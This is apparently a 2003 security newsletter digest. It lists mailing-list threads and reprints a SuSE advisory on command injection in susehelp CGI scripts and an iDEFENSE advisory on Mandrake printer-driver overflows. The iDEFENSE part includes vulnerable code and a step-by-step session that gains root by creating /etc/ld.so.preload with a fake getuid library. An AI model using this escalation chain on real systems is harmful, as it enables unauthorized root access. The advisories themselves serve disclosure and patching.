4. Understaing Event Details in Windows NT (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/306718
5. FW: AD replication over WAN (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/306762
IX. SUN FOCUS LIST SUMMARY
----------------------------
1. NO NEW POSTS FOR THE WEEK ENDING 01.17.03
X. LINUX FOCUS LIST SUMMARY
---------------------------
1. How to build CD with chkrootkit on it? (Thread)
Relevant URL:
http://online.securityfocus.com/archive/91/306728
XI. SPONSOR INFORMATION
-----------------------
This issue is sponsored by: Qualys
Strengthening Network Security: FREE Guide Network security is a
constantly moving target - even proven solutions lose their punch over
time. Find out how to get COMPLETE PROTECTION against ever-growing
security threats with our FREE new Guide.
Get your copy today at: https://www.qualys.com/forms/nsguideh_376.php
-------------------------------------------------------------------------------
_______________________________________________________________________________
END OF SF News
_______________________________________________________________________________
===============================================================================
Suse Security Announcement
--------------------------
-----BEGIN PGP SIGNED MESSAGE-----
______________________________________________________________________________
SuSE Security Announcement
Package: susehelp
Announcement-ID: SuSE-SA:2003:005
Date: Mon Jan 20 14:00:00 CET 2003
Affected products: SuSE Linux 8.1,
SuSE Linux Enterprise Server 8,
SuSE Linux Office Server,
SuSE Linux Openexchange Server 4
Vulnerability Type: remote command execution
Severity (1-10): 5
SuSE default package: no
Cross References: -
Content of this advisory:
1) security vulnerability resolved: Remote command execution due
to broken filtering of shell metacharacters in CGI queries.
problem description, discussion, solution and upgrade information
2) pending vulnerabilities, solutions, workarounds: mod_php4
3) standard appendix (further information)
______________________________________________________________________________
1) problem description, brief discussion, solution, upgrade information
During a code review of the susehelp package the SuSE Security Team
recognized that the security checks done by the susehelp CGI scripts are
insufficient.
Remote attackers can insert certain characters in CGI queries to the
susehelp system tricking it into executing arbitrary code as the "wwwrun"
user. Please note that this is only a vulnerability if you have a web server
running and configured to allow access to the susehelp system by remote
sites.
We nevertheless recommend an update of this package. As a temporary
workaround you may un-install the susehelp package by issuing the following
command as root:
rpm -e --nodeps susehelp
Please download the update package for your distribution and verify its
integrity by the methods listed in section 3) of this announcement.
Then, install the package using the command "rpm -Fhv file.rpm" to apply
the update.
Our maintenance customers are being notified individually. The packages
are being offered to install from the maintenance web.
SuSE-8.1:
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/noarch/susehelp-2002.09.05-51.noarch.rpm
6dde3d487385fd6a935643b1a0d92b86
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/noarch/susehelp-SLOD-2002.09.05-2.noarch.rpm
cd91f786f056518a11192b1ce9597783
______________________________________________________________________________
2) Pending vulnerabilities in SuSE Distributions and Workarounds:
- mod_php4
A buffer overflow in the wordwrap() function has been reported.
New packages will be prepared and should be availble soon on our ftp
servers.
______________________________________________________________________________
3) standard appendix: authenticity verification, additional information
- Package authenticity verification:
SuSE update packages are available on many mirror ftp servers all over
the world. While this service is being considered valuable and important
to the free and open source software community, many users wish to be
sure about the origin of the package and its content before installing
the package. There are two verification methods that can be used
independently from each other to prove the authenticity of a downloaded
file or rpm package:
1) md5sums as provided in the (cryptographically signed) announcement.
2) using the internal gpg signatures of the rpm package.
1) execute the command
md5sum <name-of-the-file.rpm>
after you downloaded the file from a SuSE ftp server or its mirrors.
Then, compare the resulting md5sum with the one that is listed in the
announcement. Since the announcement containing the checksums is
cryptographically signed (usually using the key secu-@suse.de),
the checksums show proof of the authenticity of the package.
We disrecommend to subscribe to security lists which cause the
email message containing the announcement to be modified so that
the signature does not match after transport through the mailing
list software.
Downsides: You must be able to verify the authenticity of the
announcement in the first place. If RPM packages are being rebuilt
and a new version of a package is published on the ftp server, all
md5 sums for the files are useless.
2) rpm package signatures provide an easy way to verify the authenticity
of an rpm package. Use the command
rpm -v --checksig <file.rpm>
to verify the signature of the package, where <file.rpm> is the
filename of the rpm package that you have downloaded. Of course,
package authenticity verification can only target an un-installed rpm
package file.
Prerequisites:
a) gpg is installed
b) The package is signed using a certain key. The public part of this
key must be installed by the gpg program in the directory
~/.gnupg/ under the user's home directory who performs the
signature verification (usually root). You can import the key
that is used by SuSE in rpm packages for SuSE Linux by saving
this announcement to a file ("announcement.txt") and
running the command (do "su -" to be root):
gpg --batch; gpg < announcement.txt | gpg --import
SuSE Linux distributions version 7.1 and thereafter install the
key "bui-@suse.de" upon installation or upgrade, provided that
the package gpg is installed. The file containing the public key
is placed at the top-level directory of the first CD (pubring.gpg)
and at ftp://ftp.suse.com/pub/suse/pubring.gpg-build.suse.de .
- SuSE runs two security mailing lists to which any interested party may
subscribe:
suse-se-@suse.com
- general/linux/SuSE security discussion.
All SuSE security announcements are sent to this list.
To subscribe, send an email to
<suse-securit-@suse.com>.
suse-securi-@suse.com
- SuSE's announce-only mailing list.
Only SuSE's security announcements are sent to this list.
To subscribe, send an email to
<suse-security-an-@suse.com>.
For general information or the frequently asked questions (faq)
send mail to:
<suse-secu-@suse.com> or
<suse-secu-@suse.com> respectively.
=====================================================================
SuSE's security contact is <secu-@suse.com> or <secu-@suse.de>.
The <secu-@suse.de> public key is listed below.
=====================================================================
______________________________________________________________________________
The information in this advisory may be distributed or reproduced,
provided that the advisory is not modified in any way. In particular,
it is desired that the clear-text signature shows proof of the
authenticity of the text.
SuSE Linux AG makes no warranties of any kind whatsoever with respect
to the information contained in this security advisory.
Type Bits/KeyID Date User ID
pub 2048R/3D25D3D9 1999-03-06 SuSE Security Team <secu-@suse.de>
pub 1024D/9C800ACA 2000-10-19 SuSE Package Signing Key <bui-@suse.de>
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv
iQEVAwUBPiv5KHey5gA9JdPZAQFN8wf6AtN4gvyTgubcxKBn81zdy4bths0yeJf9
Hb5G8otDUXb1Q5IbQyXt5pH0jyJNvpJHWpEb1CCYMXMe9FExdegEMh1xKY9hrk9x
bbiJrmw6hOwjDpWCNIVMiF7wzqSAj2P1GPjPvQzXo43hzOi70cLy5SMwOSX6nmmR
9CBpYqsDTSYFbem51I/bQr7HGwNxHNCNy1OqT0H0i4dujV4cIk/022tf5mVxnZU5
wyoKLJzhEFbMdI8H5KSxUN+wUANfLPqEKryimq0yZ9nihS/zkuhKyv8GEJ6FI2Xc
1bWMWpN+XxtnXnfhwpu9bWpvLDYRI6MWdKlpCU/M1VhDN57Zr/l22A==
=eknB
-----END PGP SIGNATURE-----
--
~
~ perl self.pl
~ $_='print"\$_=\47$_\47;eval"';eval
~ krah-@suse.de - SuSE Security Team
~
______________________________________________________________________________
END OF SuSE Security Announcement
______________________________________________________________________________
==============================================================================
iDEFENCE Security Advisory 01.21.03
-----------------------------------
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
iDEFENSE Security Advisory 01.21.03: Buffer Overflows in Mandrake Linux
printer-drivers Package
http://www.idefense.com/advisory/01.21.03.txt
January 21, 2003
I. BACKGROUND
MandrakeSoft Inc.'s Mandrake Linux includes the printer-drivers package in
most default installations. Specifically, the following three binaries are
included:
mtink: a status monitor that tracks remaining ink quantity, printing of
test patterns, and changing and cleaning cartridges, etc. It is maintained
by Jean-Jacques Sarton (jj.sa-@t-online.de).
escputil: a utility to clean and align the heads of Epson Stylus printers.
It also checks current ink levels in the printer. It is maintained by
Robert Krawitz (rl-@alum.mit.edu) and Mike Sweet.
ml85p: a Linux driver for Samsung ML-85G series printers. It is maintained
by Rildo Pragana (ril-@pragana.net).
II. DESCRIPTION
Three vulnerabilities exist, the worst of which allows local root
compromise of a target system.
VULNERABILITY ONE: The mtink binary, installed set group id (gid) 'sys',
contains a buffer overflow in its handling of the HOME environment
variable. Successful exploitation provides an attacker with 'sys' group
privileges. The following snippet contains the offending segment of code:
void readRc(int idx)
{
FILE *fp;
char rcPath[1024];
...
sprintf(rcPath,"%s/.mtinkrc",getenv("HOME"));
VULNERABILITY TWO: The escputil binary, installed set gid 'sys',contains a
buffer overflow in its parsing of the printer-name command line argument.
Successful exploitation provides an attacker with 'sys' group privileges.
VULNERABILITY THREE: The ml85p binary, installed set user id root,
contains a race condition in its opening of temporary files. Successful
exploitation provides an attacker with the ability to create or empty a
file with super user privileges. The following snippet contains the
offending segment of code:
sprintf(gname,"/tmp/mlg85p%d",time(0));
if (!(cbmf = fopen(gname,"w+"))) {
An attacker can easily guess the name of a temporary file and then link
the guessed file to a file at another location. If the other file does not
exist, it is created world-writeable; if it does exist, the contents of
the file are lost. ml85p is, by default, installed without execute
permissions for 'other':
$ ls -l /usr/bin/ml85p
- -rwsr-x--- 1 root sys 12344 Sep 17 12:40 /usr/bin/ml85p*
The binary, however, does provide execute permissions to the 'sys' group,
whose privileges can be gained using either of the two exploits in
VULNERABILITY ONE or TWO. Once 'sys' privileges are obtained, an attacker
can exploit this race condition.
The following example walks through a sample attack utilizing the
above-described methods:
$ id
uid=501(farmer) gid=501(farmer) groups=501(farmer)
$ ./escputil_ex
Usage : ./escputil_ex [offset]
Address : 0xbffff6b0
Exploiting...
Escputil version 4.2.2, Copyright (C) 2000-2001 Robert Krawitz
Escputil comes with ABSOLUTELY NO WARRANTY; for details type 'escputil -l'
This is free software, and you are welcome to redistribute it
under certain conditions; type 'escputil -l' for details.
Cleaning heads...
lpr: unable to print file: client-error-not-found
/etc/profile.d/alias.sh:31: parse error: condition expected: !=
$ id
uid=501(farmer) gid=501(farmer) egid=3(sys) groups=501(farmer)
$ ls -l /etc/ld.so.preload
ls: /etc/ld.so.preload: No such file or directory
$ ./ml85p_ex /etc/ld.so.preload
Press a key to clean/create /etc/ld.so.preload file
Wrong file format.
file position: ffffffff
$ ls -l /etc/ld.so.preload
- -rw-rw-rw- 1 root sys 0 Oct 21 09:09 /etc/ld.so.preload
$ cat > /tmp/lib.c < heredoc> int getuid(void) { return 0; }
heredoc> EOF
$ gcc -fPIC -c /tmp/lib.c
$ gcc -o /tmp/lib.so -shared /tmp/lib.o
$ echo "/tmp/lib.so" > /etc/ld.so.preload
$ su -
# id
uid=0(root) gid=0(root) groups=0(root)
III. ANALYSIS
Any attacker with local access to a targeted system can launch this
attack. The ability to empty or create with root privileges any file on
the file system provides an attacker with many avenues of exploitation.
The above-described example is just one way of quickly gaining super user
privileges on a targeted system.
IV. DETECTION
Mandrake Linux 9.0 is vulnerable. By default, it includes the following
versions of the printer-drivers package:
printer-utils-1.0-76mdk
printer-filters-1.0-76mdk
V. VENDOR FIX / RESPONSE
MandrakeSoft has identified the problems and applied author-provided fixes
to the escputil and mtink vulnerabilities. A patch written by Till
Kamppeter was applied to ml85p to fix that vulnerability. Updates are
provided for Mandrake Linux 8.1 through 9.0 for the printer-drivers
packages, and ghostscript in 8.0 to fix these vulnerabilities
(MDKSA-2003:010).
VI. DISCLOSURE TIMELINE
10/06/2002 Issues disclosed to iDEFENSE
12/26/2002 Issues disclosed to jj.sa-@t-online.de,
rl-@alum.mit.edu, ril-@pragana.net, and
secu-@linux-mandrake.com
12/26/2002 Issues disclosed to iDEFENSE clients
12/26/2002 Vendor responses from rl-@alum.mit.edu,
jj.sa-@t-online.de
12/30/2002 Response from Vincent Danen (vda-@mandrakesoft.com)
01/21/2003 Coordinated public disclosure
VIII. CREDIT
Karol Wiesek (appe-@bsquad.sm.pl) discovered these vulnerabilities.
Get paid for security research
http://www.idefense.com/contributor.html
Subscribe to iDEFENSE Advisories:
send email to list-@idefense.com, subject line: "subscribe"
About iDEFENSE:
iDEFENSE is a global security intelligence company that proactively
monitors sources throughout the world from technical
vulnerabilities and hacker profiling to the global spread of viruses
and other malicious code. Our security intelligence services provide
decision-makers, frontline security professionals and network
administrators with timely access to actionable intelligence
and decision support on cyber-related threats. For more information,
visit http://www.idefense.com .
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0
Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xE4A96E4F
iQA/AwUBPi2Xuvrkky7kqW5PEQJ3hACgmjVD0byEeUAiFdrWtRnzbcuVe9IAoP4n
seYz8DLDxY5k9zWJhd6WoGJW
=WOHM
-----END PGP SIGNATURE-----
______________________________________________________________________________
END OF iDEFENSE Security Advisory 01.21.03: Buffer Overflows in Mandrake Linux
______________________________________________________________________________
==============================================================================
************* End Of GN SecNews Vol 1 *************
==============================================================================
--
-vijay
|
|
 |
|
